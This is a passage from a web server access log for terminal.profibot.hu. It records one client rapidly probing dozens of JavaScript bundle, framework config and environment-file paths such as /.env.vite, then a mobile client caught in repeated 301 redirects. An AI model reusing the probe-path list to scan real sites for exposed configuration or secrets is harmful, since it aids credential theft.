AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/settings.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/checkout.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.chunk.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/2.chunk.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/js/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/config/env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/src/config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/src/constants.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/3.chunk.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/__config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/webpack-runtime.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/runtime~main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/api/config.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/checkout" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/donate" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/api/settings" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/index.html" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/payment" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/env-config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/serviceworker.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/js/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/vite.config.ts" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/page-data/app-data.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/qwik-loader.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/@vite/env" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/remix.config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/astro.config.mjs" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/@vite/client" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/static/js/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/js/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/vendor.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/webpack.runtime.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/svelte.config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/.env.vite" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:23:30:14 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:15 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 37.76.10.148] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:16 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:17 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:22 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:23 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:30:40 +0000] 